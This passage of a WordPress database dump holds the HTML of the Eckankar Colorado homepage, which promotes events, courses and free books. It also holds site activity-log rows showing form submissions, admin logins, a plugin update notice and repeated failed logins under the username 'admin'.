height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(231586,39187,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215571,35552,'days','60'),(215572,35552,'num_rows','1037'),(215573,35552,'_message_key','purged_events'),(215574,35552,'_wp_cron_running','true'),(215575,35552,'_server_remote_addr','173.231.231.x'),(215576,35553,'post_id','269128'),(215577,35553,'post_type','nf_sub'),(215578,35553,'post_title',''),(215579,35553,'_message_key','post_updated'),(215580,35553,'_server_remote_addr','174.51.17.x'),(215581,35553,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(215582,35554,'post_id','269129'),(215583,35554,'post_type','nf_sub'),(215584,35554,'post_title',''),(215585,35554,'_message_key','post_updated'),(215586,35554,'_server_remote_addr','73.95.100.x'),(215587,35554,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(215588,35555,'post_id','269130'),(215589,35555,'post_type','nf_sub'),(215590,35555,'post_title',''),(215591,35555,'_message_key','post_updated'),(215592,35555,'_server_remote_addr','73.65.223.x'),(215593,35555,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(215594,35556,'post_id','269131'),(215595,35556,'post_type','nf_sub'),(215596,35556,'post_title',''),(215597,35556,'_message_key','post_updated'),(215598,35556,'_server_remote_addr','185.238.231.x'),(215599,35556,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(215600,35557,'post_id','269132'),(215601,35557,'post_type','nf_sub'),(215602,35557,'post_title',''),(215603,35557,'_message_key','post_updated'),(215604,35557,'_server_remote_addr','174.16.232.x'),(215605,35557,'_server_http_referer','https://eckankar-colorado.org/newsletter-subscription-public/'),(215606,35558,'post_id','269133'),(215607,35558,'post_type','nf_sub'),(215608,35558,'post_title',''),(215609,35558,'_message_key','post_updated'),(215610,35558,'_server_remote_addr','136.36.157.x'),(215611,35558,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(215612,35559,'user_id','2'),(215613,35559,'user_email','nada@zipnadanot.org'),(215614,35559,'user_login','S8zhaBda'),(215615,35559,'_user_id','2'),(215616,35559,'_user_login','S8zhaBda'),(215617,35559,'_user_email','nada@zipnadanot.org'),(215618,35559,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(215619,35559,'_message_key','user_logged_in'),(215620,35559,'_server_remote_addr','76.130.120.x'),(215621,35559,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(215622,35560,'post_id','269135'),(215623,35560,'post_type','nf_sub'),(215624,35560,'post_title',''),(215625,35560,'_message_key','post_updated'),(215626,35560,'_server_remote_addr','98.53.217.x'),(215627,35560,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(215628,35561,'post_id','269136'),(215629,35561,'post_type','nf_sub'),(215630,35561,'post_title',''),(215631,35561,'_message_key','post_updated'),(215632,35561,'_server_remote_addr','137.59.217.x'),(215633,35561,'_server_http_referer','https://eckankar-colorado.org/contact-us/'),(215634,35562,'failed_username','admin'),(215635,35562,'server_http_user_agent','Mozilla/5.0'),(215636,35562,'_message_key','user_unknown_login_failed'),(215637,35562,'_server_remote_addr','74.249.245.x'),(215638,35563,'plugin_name','WP Fastest Cache'),(215639,35563,'plugin_current_version','1.1.9'),(215640,35563,'plugin_new_version','1.2.0'),(215641,35563,'_message_key','plugin_update_available'),(215642,35563,'_server_remote_addr','173.231.231.x'),(215643,35564,'failed_username','admin'),(215644,35564,'server_http_user_agent','Mozilla/5.0'),(215645,35564,'_message_key','user_unknown_login_failed'),(215646,35564,'_server_remote_addr','74.249.245.x'),(215647,35565,'failed_username','admin'),(215648,35565,'server_http_user_agent','Mozilla/5.0'),(215649,35565,'_message_key','user_unknown_login_failed'),(215650,35565,'_server_remote_addr','74.249.245.x'),(215651,35566,'failed_username','admin'),(215652,35566,'server_http_user_agent','Mozilla/5.0'),(215653,35566,'_message_key','user_unknown_login_failed'),(215654,35566,'_server_remote_addr','74.249.245.x'),(215655,35567,'failed_username','admin'),(215656,35567,'server_http_user_agent','Mozilla/5.0'),(215657,35567,'_message_key','user_unknown_login_failed'),(215658,35567,'_server_remote_addr','74.249.245.x'),(215659,35568,'failed_username','admin'),(215660,35568,'server_http_user_agent','Mozilla/5.0'),(215661,35568,'_message_key','user_unknown_login_failed'),(215662,35568,'_server_remote_addr','74.249.245.x'),(215663,35569,'failed_username','admin'),(215664,35569,'server_http_user_agent','Mozilla/5.0'),(215665,35569,'_message_key','user_unknown_login_failed'),(215666,35569,'_server_remote_addr','74.249.245.x'),(215667,35570,'failed_username','admin'),(215668,35570,'server_http_user_agent','Mozilla/5.0'),(215669,35570,'_message_key','user_unknown_login_failed'),(215670,35570,'_server_remote_addr','74.249.245.x'),(215671,35571,'failed_username','admin'),(215672,35571,'server_http_user_agent','Mozilla/5.0'),(215673,35571,'_message_key','user_unknown_login_failed'),(215674,35571,'_server_remote_addr','74.249.245.x'),(215675,35572,'failed_username','admin'),(215676,35572,'server_http_user_agent','Mozilla/5.0'),(215677,35572,'_message_key','user_unknown_login_failed'),(215678,35572,'_server_remote_addr','74.249.245.x'),(215679,35573,'failed_username','admin'),(215680,35573,'server_http_user_agent','Mozilla/5.0'),(215681,35573,'_message_key','user_unknown_login_failed'),(215682,35573,'_server_remote_addr','74.249.245.x'),(215683,35574,'failed_username','admin'),(215684,35574,'server_http_user_agent','Mozilla/5.0'),(215685,35574,'_message_key','user_unknown_login_failed'),(215686,35574,'_server_remote_addr','74.249.245.x'),(215687,35575,'failed_username','admin'),(215688,35575,'server_http_user_agent','Mozilla/5.0'),(215689,35575,'_message_key','user_unknown_login_failed'),(215690,35575,'_server_remote_addr','74.249.245.x'),(215691,35576,'failed_username','admin'),(215692,35576,'server_http_user_agent','Mozilla/5.0'),(215693,35576,'_message_key','user_unknown_login_failed'),(215694,35576,'_server_remote_addr','74.249.245.x'),(215695,35577,'failed_username','admin'),(215696,35577,'server_http_user_agent','Mozilla/5.0'),(215697,35577,'_message_key','user_unknown_login_failed'),(215698,35577,'_server_remote_addr','74.249.245.x'),(215699,35578,'failed_username','admin'),(215700,35578,'server_http_user_agent','Mozilla/5.0'),(215701,35578,'_message_key','user_unknown_login_failed'),(215702,35578,'_server_remote_addr','74.249.245.x'),(215703,35579,'failed_username','admin'),(215704,35579,'server_http_user_agent','Mozilla/5.0'),(215705,35579,'_message_key','user_unknown_login_failed'),(215706,35579,'_server_remote_addr','74.249.245.x'),(215707,35580,'failed_username','admin'),(215708,35580,'server_http_user_agent','Mozilla/5.0'),(215709,35580,'_message_key','user_unknown_login_failed'),(215710,35580,'_server_remote_addr','74.249.245.x'),(215711,35581,'failed_username','admin'),(215712,35581,'server_http_user_agent','Mozilla/5.0'),(215713,35581,'_message_key','user_unknown_login_failed'),(215714,35581,'_server_remote_addr','74.249.245.x'),(215715,35582,'failed_username','admin'),(215716,35582,'server_http_user_agent','Mozilla/5.0'),(215717,35582,'_message_key','user_unknown_login_failed'),(215718,35582,'_server_remote_addr','74.249.245.x'),(215719,35583,'failed_username','admin'),(215720,35583,'server_http_user_agent','Mozilla/5.0'),(215721,35583,'_message_key','user_unknown_login_failed'),(215722,35583,'_server_remote_addr','74.249.245.x'),(215723,35584,'failed_username','admin'),(215724,35584,'server_http_user_agent','Mozilla/5.0'),(215725,35584,'_message_key','user_unknown_login_failed'),(215726,35584,'_server_remote_addr','74.249.245.x'),(215727,35585,'user_id','2'),(215728,35585,'user_email','nada@zipnadanot.org'),(215729,35585,'user_login','S8zhaBda'),(215730,35585,'_user_id','2'),(215731,35585,'_user_login','S8zhaBda'),(215732,35585,'_user_email','nada@zipnadanot.org'),(215733,35585,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(215734,35585,'_message_key','user_logged_in'),(215735,35585,'_server_remote_addr','76.130.120.x'),(215736,35585,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(215737,35586,'failed_username','admin'),(215738,35586,'server_http_user_agent','Mozilla/5.0'),(215739,35586,'_message_key','user_unknown_login_failed'),(215740,35586,'_server_remote_addr','74.249.245.x'),(215741,35587,'failed_username','admin'),(215742,35587,'server_http_user_agent','Mozilla/5.0'),(215743,35587,'_message_key','user_unknown_login_failed'),(215744,35587,'_server_remote_addr','74.249.245.x'),(215745,35588,'failed_username','admin'),(215746,35588,'server_http_user_agent','Mozilla/5.0'),(215747,35588,'_message_key','user_unknown_login_failed'),(215748,35588,'_server_remote_addr','74.249.245.x'),(215749,35589,'failed_username','admin'),(215750,35589,'server_http_user_agent','Mozilla/5.0'),(215751,35589,'_message_key','user_unknown_login_failed'),(215752,35589,'_server_remote_addr','74.249.245.x'),(215753,35590,'failed_username','admin'),(215754,35590,'server_http_user_agent','Mozilla/5.0'),(215755,35590,'_message_key','user_unknown_login_failed'),(215756,35590,'_server_remote_addr','74